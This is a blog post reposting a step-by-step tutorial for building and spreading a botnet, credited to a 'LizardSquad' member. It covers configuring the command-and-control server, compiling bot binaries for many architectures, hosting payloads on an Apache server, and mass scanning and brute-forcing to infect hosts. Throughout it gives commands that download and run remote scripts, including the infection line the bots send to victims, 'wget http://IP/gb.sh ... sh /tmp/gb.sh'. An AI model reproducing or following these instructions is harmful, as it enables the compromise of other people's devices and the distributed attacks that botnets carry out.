Wednesday, August 10, 2016

P2P Botnet Files and Sales

..:: Sinden's LizardSquad Botnet Tutorial ::..

LIST OF COMMANDS: http://pastebin.com/raw.php?i=kiVSGX2u

• Introduction:
Hello my name is Sinden. I'm currently thinking about quitting from this community so felt obliged to
leak this very nice protocol w/ tutorial. Please show your support and appreciation and comment below!

• What You Will Need:
- 2 x Virtual Private Servers
* [At least 4GB RAM] [Centos 6 Or Below Is Recommended!]
- My Custom Files
* [Server.c "http://hastebin.com/raw/ogifodejub"; client.c "http://hastebin.com/raw/evuquwakon"]
- Custom LRAB Scanner
* "https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip"
- Dedicated Scanning Server
* [Any Server That Is Capable Of Mass TCP Scanning]

TIP: Good Server Hosts:
!* - Ecatel - http://www.Ecatel.info
!* - VPSDime - http://www.VPSDime.com
!* - HudsonValleyHost.com - http://www.HudsonValleyHost.com
!* - LeaseWeb - http://www.LeaseWeb.com/

• Getting Your Server Ready:
!* - First you will need to install all the dependencies and repositories on your hosting server to run everything as smooth as possible

1. [Centos] - Run this command *NOTE Run this on both your servers!
Command: "wget http://pastebin.com/raw.php?i=Nd1PkEz0 -O update; chmod 777 update; sh update"

!* - Once this has completed you are going to have to configure your botnet server. *Note If you're running any other distro edit the update file to apt-get.

2. Run "wget http://hastebin.com/raw/ogifodejub -O server.c; nano server.c" and edit this part
Code:
//Admin-Config
#define MY_MGM_ADMINP "Password"
#define MY_MGM_ADMINU "User"
#define MY_MGM_MATENP "Password"
#define MY_MGM_MATENU "User"
#define MY_MGM_USERP "Password"
#define MY_MGM_USERU "User"
#define MY_MGM_GUESTP "Password"
#define MY_MGM_GUESTU "User"
#define MY_MGM_PORT 6969
This is the login and port settings for the botnet protocol. Edit the four clients that look like this "Password" "User".

!* - Once you have edited the file exit and save all changes.

3. Run "gcc -o server server.c -pthread; screen ./server 164 1000" and then once the screen process hold CTRL + A and press D.

!* - That command has disconnected you from the server screen process but will still always be running in the background.

4. Run "yum install nc -y --skip-broken" or "yum install netcat -y --skip-broken"

5. Run "nc localhost 6969"

!* - This should prompt you with a login screen. Use the credentials that you edited in the file.

6. Press CTRL + C to exit and open your secondary server.

!* - This secondary server is your Apache host for your binary's.

7. Run "service httpd start" then "cd /var/www/html"

8. Run "wget http://hastebin.com/raw/digeqiwoya -O arch-wget; sh arch-wget; rm -rf arch-wget"

9. Run "wget http://hastebin.com/raw/evuquwakon -O client.c; nano client.c"

!* - Now this is were you need to pay attention and read carefully.

!* - Find this part in the client.c
Code:
// ___ __ _
// / __\___ _ __ / _(_) __ _
// / / / _ \| '_ \| |_| |/ _` |
// / /__| (_) | | | | _| | (_| |
// \____/\___/|_| |_|_| |_|\__, |
// |___/

unsigned char *commServer[] =
{
"IP:PORT" //Start the server on this port
};

10. Edit the IP to your botnet server host and your port to "164"

!* - Find this part of the code on line 990
Code:
if(send(fds[i].fd, "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n", 79, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }

11. Edit the IP in the wget to the server that's hosting your binaries and change all the file names to what you want your file name to be *NOTE Must end with .sh

!* - Now you need to change the character count and thats this part in that line of code
Code:
79, MSG_NOSIGNAL)

!* - You need to open a code editor e.g Notepad++ or Sublime text that shows character count.

e.g "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n" the charactor count is 72 *Note Remember "\r\n" you only count the letters not "\".

!* - Once you have edited that file exit and save.

12. Run "wget http://hastebin.com/raw/momuromite -O comp; sh comp client.c"

!* - This will automatically compile your bot to all 12 architectures.

13. On the Apache host server run "wget http://hastebin.com/raw/momuromite -O gb.sh" *NOTE change the name of the file according to what you named it in client.c

14. Run "nano gb.sh" and edit all the parts with the part "IP" to the IP that's hosting your binaries

!* - Check the Apache host IP on your browser like ip/gb.sh to check if the file downlaods

..:: END OF BOTNET SETUP... CONTINUE TO LEARN HOW TO ADD BOTS ::..

!* - Login into your scanning server

1. Run "yum install unzip -y --skip-broken"

2. Run "cd /var/opt; mkdir .scan; cd .scan; wget https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip; unzip LRAB.zip; cd LRAB"

3. Run "wget http://pastebin.com/raw.php?i=AwEqTNTA -O wget.pl; nano wget.pl"

!* - Find this line
Code:
$channel->exec('wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh');

4. Edit the IP and file name to your binary host IP and .sh file name and save and exit.

5. Run "wget http://pastebin.com/raw.php?i=enUdaRrk -O mass"

6. Run "nano mass" and only edit the ranges accept if your interface isn't eth0. *Note You have a complete choice on what ranges you want to scan.

7. Run "screen sh mass" and then hold CTRL+A and press D to de-attach from screen.

!* - Once the scan is done it will automatically start to bruteforce.

*NOTE: To check if the scan is done run "ps -A | grep class" and to check if the bruteforce is still running "ps -A | grep update"

8. To finally add the bots to your net run the finished vuln by typing "perl wget.pl vuln.txt"

Tuturial

Net Tool'z

Wednesday, August 10, 2016

P2P Botnet Files and Sales

0 comments :

Popular Posts

The Slider

Labels Cloud

Blog Archive

random posts

recent posts

recent posts

social counter

Like us on facebook

technology

Popular Posts